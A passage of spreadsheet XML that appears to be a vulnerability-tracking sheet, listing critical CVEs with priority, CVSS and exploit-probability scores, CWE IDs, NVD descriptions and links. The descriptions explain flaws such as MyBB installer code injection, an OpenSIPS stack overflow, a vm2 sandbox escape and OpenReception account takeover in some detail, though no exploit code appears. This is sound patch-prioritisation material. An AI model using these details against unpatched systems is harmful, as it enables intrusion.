          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E151" s="5" t="inlineStr"/>
      <c r="F151" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G151" s="5" t="inlineStr"/>
      <c r="H151" s="5" t="inlineStr"/>
      <c r="I151" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J151" s="5" t="inlineStr"/>
      <c r="K151" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L151" s="5" t="inlineStr">
        <is>
          <t>MyBB is free and open source forum software. From 1.8.13 until 1.8.40, the installer module does not properly escape user-supplied database configuration values written to the configuration file, resulting in PHP code injection and remote code execution when the installer is available. install/index.php processes the values with addcslashes(), but the $characters argument added in MyBB 1.8.13 does not include the backslash character, allowing crafted input to escape the generated PHP string. The uniquely identifying implementation details include introduced in MyBB 1.8.13. This issue is fixed in version 1.8.40.</t>
        </is>
      </c>
      <c r="M151" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45117</t>
        </is>
      </c>
    </row>
    <row r="152">
      <c r="A152" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B152" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45538</t>
        </is>
      </c>
      <c r="C152" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D152" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E152" s="5" t="inlineStr"/>
      <c r="F152" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G152" s="5" t="inlineStr"/>
      <c r="H152" s="5" t="inlineStr"/>
      <c r="I152" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J152" s="5" t="inlineStr"/>
      <c r="K152" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L152" s="5" t="inlineStr">
        <is>
          <t>OpenSIPS is a Session Initiation Protocol (SIP) server implementation. In versions 4.0.0 and prior, processing a SIP message with a header name longer than 255 bytes causes a stack buffer overflow when sip_to_json() is called in the routing script. Function sip_to_json() (modules/sipmsgops/sipmsgops.c) copies SIP header names into a fixed 255-byte stack buffer without bounds checking, performing a memcpy of the full header-name length even though the SIP parser imposes no such limit (a header name can be roughly 65000 bytes). As a result, when a routing script calls sip_to_json(), a SIP message with a header name longer than 255 bytes triggers a stack buffer overflow in which both the length and content of the overwrite are attacker-controlled, corrupting the saved frame pointer and return address. A single unauthenticated UDP packet to the SIP port (5060) can crash the process or, on builds without stack protections, hijack the return address to achieve remote code execution. This affects deployments whose routing script invokes sip_to_json(). This issue was not fixed at the time of publication.</t>
        </is>
      </c>
      <c r="M152" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45538</t>
        </is>
      </c>
    </row>
    <row r="153">
      <c r="A153" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B153" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46670</t>
        </is>
      </c>
      <c r="C153" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D153" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E153" s="5" t="inlineStr"/>
      <c r="F153" s="5" t="n">
        <v>0.019</v>
      </c>
      <c r="G153" s="5" t="inlineStr"/>
      <c r="H153" s="5" t="inlineStr"/>
      <c r="I153" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J153" s="5" t="inlineStr"/>
      <c r="K153" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L153" s="5" t="inlineStr">
        <is>
          <t>YesWiki is a wiki system written in PHP. Prior to version 4.6.4,  an unauthenticated SQL injection in the Bazar form-import path (`FormManager::create()`) allows any unauthenticated visitor of a default YesWiki install to inject arbitrary SQL into an `INSERT` statement and read the full database, including `yeswiki_users.password` hashes. Version 4.6.4 fixes the issue.</t>
        </is>
      </c>
      <c r="M153" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46670</t>
        </is>
      </c>
    </row>
    <row r="154">
      <c r="A154" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B154" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47698</t>
        </is>
      </c>
      <c r="C154" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D154" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E154" s="5" t="inlineStr"/>
      <c r="F154" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G154" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H154" s="5" t="inlineStr"/>
      <c r="I154" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J154" s="5" t="inlineStr"/>
      <c r="K154" s="5" t="inlineStr">
        <is>
          <t>CWE-913</t>
        </is>
      </c>
      <c r="L154" s="5" t="inlineStr">
        <is>
          <t>vm2 is an open source vm/sandbox for Node.js. Prior to 3.11.6, lib/bridge.js and lib/setup-sandbox.js fail to block stacked indirection through Function.prototype.call around dangerous host prototype getter and setter mutators, allowing sandbox code to sever a host intrinsic's prototype chain and reach e.constructor.constructor for arbitrary host command execution. This issue is fixed in version 3.11.6.</t>
        </is>
      </c>
      <c r="M154" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47698</t>
        </is>
      </c>
    </row>
    <row r="155">
      <c r="A155" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B155" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47884</t>
        </is>
      </c>
      <c r="C155" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D155" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E155" s="5" t="inlineStr"/>
      <c r="F155" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G155" s="5" t="inlineStr">
        <is>
          <t>vmware, spring</t>
        </is>
      </c>
      <c r="H155" s="5" t="inlineStr">
        <is>
          <t>vmware:spring_framework</t>
        </is>
      </c>
      <c r="I155" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J155" s="5" t="inlineStr"/>
      <c r="K155" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L155" s="5" t="inlineStr">
        <is>
          <t>Use of XsltView in a Spring MVC application can result in SSRF and RCE attack if the application has an "/**" mapping that results in view rendering, and where the view name is not explicitly specified.
Spring Framework 7.0.0 - 7.0.8
Spring Framework 6.2.0 - 6.2.19
Spring Framework 6.1.0 - 6.1.28
Spring Framework 6.0.0 - 6.0.30
Spring Framework 5.3.0 - 5.3.49
Spring Framework 5.2.25.RELEASE and earlier</t>
        </is>
      </c>
      <c r="M155" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47884</t>
        </is>
      </c>
    </row>
    <row r="156">
      <c r="A156" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B156" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-4800</t>
        </is>
      </c>
      <c r="C156" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D156" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E156" s="5" t="inlineStr"/>
      <c r="F156" s="5" t="n">
        <v>0.028</v>
      </c>
      <c r="G156" s="5" t="inlineStr"/>
      <c r="H156" s="5" t="inlineStr">
        <is>
          <t>lodash:lodash, lodash:lodash-amd, lodash:lodash-es, lodash:lodash.template</t>
        </is>
      </c>
      <c r="I156" s="5" t="inlineStr">
        <is>
          <t>2026-03-31</t>
        </is>
      </c>
      <c r="J156" s="5" t="inlineStr"/>
      <c r="K156" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L156" s="5" t="inlineStr">
        <is>
          <t>Impact:
The fix for CVE-2021-23337 (https://github.com/advisories/GHSA-35jh-r3h4-6jhm) added validation for the variable option in _.template but did not apply the same validation to options.imports key names. Both paths flow into the same Function() constructor sink.
When an application passes untrusted input as options.imports key names, an attacker can inject default-parameter expressions that execute arbitrary code at template compilation time.
Additionally, _.template uses assignInWith to merge imports, which enumerates inherited properties via for..in. If Object.prototype has been polluted by any other vector, the polluted keys are copied into the imports object and passed to Function().
Patches:
Users should upgrade to version 4.18.0.
Workarounds:
Do not pass untrusted input as key names in options.imports. Only use developer-controlled, static key names.</t>
        </is>
      </c>
      <c r="M156" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-4800</t>
        </is>
      </c>
    </row>
    <row r="157">
      <c r="A157" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B157" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48085</t>
        </is>
      </c>
      <c r="C157" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D157" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E157" s="5" t="inlineStr"/>
      <c r="F157" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G157" s="5" t="inlineStr"/>
      <c r="H157" s="5" t="inlineStr"/>
      <c r="I157" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J157" s="5" t="inlineStr"/>
      <c r="K157" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L157" s="5" t="inlineStr">
        <is>
          <t>OpenReception's appointment booking software provides an end-to-end encrypted appointment booking platform. Prior to version 1.0.1, a fully provisioned OpenReception instance accepts unauthenticated POST requests to `/setup/create-admin-account` and creates additional GLOBAL_ADMIN accounts without verifying that an admin already exists. Any unauthenticated network attacker who can submit a same-origin form POST gains full platform-level administrative control. The newly created account is `is_active=true` with `confirmation_state=ACCESS_GRANTED` and does not require completing email confirmation; the GLOBAL_ADMIN row is created active and immediately usable. Login and tenant enumeration succeed without any further interaction. This is distinct from the deployment race condition already documented on the `Claiming an instance` page. That documented race covers the window between deployment and first claim. The bug reported here works after the operator has properly claimed and configured the instance: the layout-level guard that protects the setup page only redirects on GET, while the `default` form action handler creates the user without rechecking `adminExists()`. Three GLOBAL_ADMIN accounts were created in succession during testing, with no rate limiting observed. Audit-specific event logging beyond standard application logs was not assessed; the standard `[error]` line that surfaces only when a uniqueness conflict is hit is not the same as a security event for "additional admin created post-claim". The form post is rejected for browser drive-by CSRF by SvelteKit's built-in same-origin check, but any tool that supplies a matching `Origin` header (curl, Burp, automated scanners, server-side proxies) bypasses this trivially. No additional preconditions exist. Users should upgrade to version 1.0.1 to receive a patch.</t>
        </is>
      </c>
      <c r="M157" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48085</t>
        </is>
      </c>
    </row>
    <row r="158">
      <c r="A158" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B158" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48087</t>
        </is>
      </c>
      <c r="C158" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D158" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E158" s="5" t="inlineStr"/>
      <c r="F158" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G158" s="5" t="inlineStr"/>
      <c r="H158" s="5" t="inlineStr"/>
      <c r="I158" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J158" s="5" t="inlineStr"/>
      <c r="K158" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L158" s="5" t="inlineStr">
        <is>
          <t>OpenReception's appointment booking software provides an end-to-end encrypted appointment booking platform. Prior to version 1.0.2, the registration handler at `POST /api/auth/register/{userId}` validates the relationship between the WebAuthn challenge and the registration cookie's email but never validates that the `userId` in the URL belongs to that email. An unauthenticated attacker requests a challenge for their own email, generates a registration response with their own authenticator, and submits it against any victim user's URL. The challenge-vs-cookie email match passes, the WebAuthn ceremony validates, and `addPasskey` writes the attacker's credential into the victim's `user_passkey` rows. The next victim-email login accepts a passkey assertion from the attacker's authenticator and issues a session as the victim. User IDs are not strictly secret on this platform, but the exact set of exposure surfaces should be assessed by the maintainers. Staff-list endpoints return user IDs to authenticated tenant members per the route signature; live verification of all exposure surfaces (whether user IDs leak through any unauthenticated route, through invite-confirmation URLs, or through other administrative views) is part of the pending live PoC. Where the attacker knows the victim's email and userId, the analysis below becomes account takeover. Version 1.0.2 fixes the issue.</t>
        </is>
      </c>
      <c r="M158" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48087</t>
        </is>
      </c>
    </row>
    <row r="159">
      <c r="A159" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B159" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49819</t>
        </is>
      </c>
      <c r="C159" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D159" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E159" s="5" t="inlineStr"/>
      <c r="F159" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G159" s="5" t="inlineStr"/>
      <c r="H159" s="5" t="inlineStr"/>
      <c r="I159" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J159" s="5" t="inlineStr"/>
      <c r="K159" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-306, CWE-78, CWE-862</t>
        </is>
      </c>
      <c r="L159" s="5" t="inlineStr">
        <is>
          <t>UpSnap is a wake on lan web app. Versions 4.4.1 through 5.3.5 are vulnerable to a missing-authentication / privilege-escalation chain in `pb.HandlerInitSuperuser` (`backend/pb/handlers.go:249`), reachable as `POST /api/upsnap/init-superuser`. The vulnerable code lacks any authentication, setup token, IP allow-list, or rate limit and is gated only by a `totalSuperusers &gt; 0` count check — a condition that is false on every fresh install — allowing an unauthenticated network-adjacent attacker to register the initial superuser account, receive a long-lived JWT, and pivot to root remote code execution at `backend/networking/wake.go:43` (`exec.CommandContext(ctx, "/bin/sh", "-c", wake_cmd)`). Version 5.4.0 fixes the issue.</t>
        </is>
      </c>
      <c r="M159" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49819</t>
        </is>
      </c>
    </row>
    <row r="160">
      <c r="A160" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B160" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49921</t>
        </is>
      </c>
      <c r="C160" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D160" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E160" s="5" t="inlineStr"/>
      <c r="F160" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G160" s="5" t="inlineStr"/>
      <c r="H160" s="5" t="inlineStr"/>
      <c r="I160" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J160" s="5" t="inlineStr"/>
      <c r="K160" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L160" s="5" t="inlineStr">
        <is>
          <t>In multiple locations, there is a possible memory safety issue due to a heap buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M160" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49921</t>
        </is>
      </c>
    </row>
    <row r="161">
      <c r="A161" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B161" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50769</t>
        </is>
      </c>
      <c r="C161" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D161" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E161" s="5" t="inlineStr"/>
      <c r="F161" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G161" s="5" t="inlineStr"/>
      <c r="H161" s="5" t="inlineStr"/>
      <c r="I161" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J161" s="5" t="inlineStr"/>
      <c r="K161" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L161" s="5" t="inlineStr">
        <is>
          <t>The CRM+ application before and including version 2025.6 from Brainformatik is vulnerable to SQL Injection (time-based) vulnerability. The check conflict endpoint index.php?module=Appointments&amp;action=CheckConflictOfDates&amp;ajaxSkipHeader=true which is used to check any conflicts for user calendar is vulnerable to SQL injection allowing an attacker to execute arbitrary code.</t>
        </is>
      </c>
      <c r="M161" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50769</t>
        </is>
      </c>
    </row>
    <row r="162">
      <c r="A162" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B162" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50774</t>
        </is>
      </c>
      <c r="C162" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D162" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E162" s="5" t="inlineStr"/>
      <c r="F162" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G162" s="5" t="inlineStr"/>
      <c r="H162" s="5" t="inlineStr"/>
      <c r="I162" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J162" s="5" t="inlineStr"/>
      <c r="K162" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L162" s="5" t="inlineStr">
        <is>
          <t>An issue in GAPTEQ Designer v.3.5 allows a remote attacker to escalate privileges via the Company Manger role.</t>
        </is>
      </c>
      <c r="M162" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50774</t>
        </is>
      </c>
    </row>
    <row r="163">
      <c r="A163" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B163" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50775</t>
        </is>
      </c>
      <c r="C163" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D163" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E163" s="5" t="inlineStr"/>
      <c r="F163" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G163" s="5" t="inlineStr"/>
      <c r="H163" s="5" t="inlineStr"/>
      <c r="I163" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J163" s="5" t="inlineStr"/>
      <c r="K163" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L163" s="5" t="inlineStr">
        <is>
          <t>A blind SSRF attack in DataHub v.1.5.0.1 allows a remote attacker to execute arbitrary code via the server retrieving an image from a crafted URL, and it fails to return the content or any errors directly.</t>
        </is>
      </c>
      <c r="M163" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50775</t>
        </is>
      </c>
    </row>
    <row r="164">
      <c r="A164" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B164" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50894</t>
        </is>
      </c>
      <c r="C164" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D164" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E164" s="5" t="inlineStr"/>
      <c r="F164" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G164" s="5" t="inlineStr"/>
      <c r="H164" s="5" t="inlineStr"/>
      <c r="I164" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J164" s="5" t="inlineStr"/>
      <c r="K164" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="L164" s="5" t="inlineStr">
        <is>
          <t>easyadmin v2.0.2.2 is vulnerable to Unrestricted Upload of File with Dangerous Type in the background management interface which allows authenticated remote attackers to execute arbitrary code and gain server privileges via a crafted file upload.</t>
        </is>
      </c>
      <c r="M164" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50894</t>
        </is>
      </c>
    </row>
    <row r="165">
      <c r="A165" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B165" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51190</t>
        </is>
      </c>
      <c r="C165" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D165" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E165" s="5" t="inlineStr"/>
      <c r="F165" s="5" t="n">
        <v>0.013</v>
      </c>
      <c r="G165" s="5" t="inlineStr"/>
      <c r="H165" s="5" t="inlineStr"/>
      <c r="I165" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J165" s="5" t="inlineStr"/>
      <c r="K165" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L165" s="5" t="inlineStr">
        <is>
          <t>The "s init" command in Serverless-Devs @serverless-devs/s &lt;= 3.1.11 passes unsanitized user input to child_process.spawn() with shell: true. A URL ending in ".git" bypasses the only input check, allowing OS command injection when a user runs "s init" with an attacker-controlled argument.</t>
        </is>
      </c>
      <c r="M165" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51190</t>
        </is>
      </c>
    </row>
    <row r="166">
      <c r="A166" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B166" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51775</t>
        </is>
      </c>
      <c r="C166" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D166" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E166" s="5" t="inlineStr"/>
      <c r="F166" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G166" s="5" t="inlineStr"/>
      <c r="H166" s="5" t="inlineStr"/>
      <c r="I166" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J166" s="5" t="inlineStr"/>
      <c r="K166" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L166" s="5" t="inlineStr">
        <is>
          <t>SQL injection vulnerability in Fastadmin v.1.6.1.20250430 allows an attacker to exectue arbitrary code via the application/common/controller/Backend.php component</t>
        </is>
      </c>
      <c r="M166" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51775</t>
        </is>
      </c>
    </row>
    <row r="167">
      <c r="A167" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B167" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52098</t>
        </is>
      </c>
      <c r="C167" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D167" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E167" s="5" t="inlineStr"/>
      <c r="F167" s="5" t="inlineStr"/>
      <c r="G167" s="5" t="inlineStr"/>
      <c r="H167" s="5" t="inlineStr"/>
      <c r="I167" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J167" s="5" t="inlineStr"/>
      <c r="K167" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L167" s="5" t="inlineStr">
        <is>
          <t>An issue in Flowise 3.1.2 allows a remote attacker to execute arbitrary code via the /api/v1/prediction/&lt;flowId&gt; endpoint</t>
        </is>
      </c>
      <c r="M167" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52098</t>
        </is>
      </c>
    </row>
    <row r="168">
      <c r="A168" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B168" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52102</t>
        </is>
      </c>
      <c r="C168" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D168" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E168" s="5" t="inlineStr"/>
      <c r="F168" s="5" t="n">
        <v>0.018</v>
      </c>
      <c r="G168" s="5" t="inlineStr"/>
      <c r="H168" s="5" t="inlineStr"/>
      <c r="I168" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J168" s="5" t="inlineStr"/>
      <c r="K168" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L168" s="5" t="inlineStr">
        <is>
          <t>An OS command injection vulnerability in the openmediavault-md plugin of OpenMediaVault v8.0.4-1 allows attackers to execute arbitrary commands as root via injecting shell metacharacters.</t>
        </is>
      </c>
      <c r="M168" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52102</t>
        </is>
      </c>
    </row>
    <row r="169">
      <c r="A169" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B169" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52103</t>
        </is>
      </c>
      <c r="C169" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D169" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E169" s="5" t="inlineStr"/>
      <c r="F169" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G169" s="5" t="inlineStr"/>
      <c r="H169" s="5" t="inlineStr"/>
      <c r="I169" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J169" s="5" t="inlineStr"/>
      <c r="K169" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L169" s="5" t="inlineStr">
        <is>
          <t>A zero-click remote code execution (RCE) vulnerability in the /Terminal/Notification.hs component of SimpleX Chat before v6.5 allows attackers to execute arbitrary commands in the context of the application without user interaction via sending a crafted payload in a text message.</t>
        </is>
      </c>
      <c r="M169" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52103</t>
        </is>
      </c>
    </row>
    <row r="170">
      <c r="A170" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B170" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52111</t>
        </is>
      </c>
      <c r="C170" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D170" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E170" s="5" t="inlineStr"/>
      <c r="F170" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G170" s="5" t="inlineStr"/>
      <c r="H170" s="5" t="inlineStr"/>
      <c r="I170" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J170" s="5" t="inlineStr"/>
      <c r="K170" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L170" s="5" t="inlineStr">
        <is>
          <t>An issue in fast-note-sync-service &lt;=2.13.7 allows a remote attacker to escalate privileges via the admin configuration endpoint exposes authTokenKey</t>
        </is>
      </c>
      <c r="M170" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52111</t>
        </is>
      </c>
    </row>
    <row r="171">
      <c r="A171" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B171" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52466</t>
        </is>
      </c>
      <c r="C171" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D171" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E171" s="5" t="inlineStr"/>
      <c r="F171" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G171" s="5" t="inlineStr"/>
      <c r="H171" s="5" t="inlineStr"/>
      <c r="I171" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J171" s="5" t="inlineStr"/>
      <c r="K171" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L171" s="5" t="inlineStr">
        <is>
          <t>Open Library Foundation VuFind v11.0.3 and v4.1 is vulnerable to toInorrect Access Control. The application fails to stop processing an incoming request in VuFind\Controller\AbstractBase::validateAccessPermission after it has found that controller level access permissions do not allow access to the requested function. The requester receives a response indicating that access was denied, but the actual function is executed regardless of that.</t>
        </is>
      </c>
      <c r="M171" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52466</t>
        </is>
      </c>
    </row>
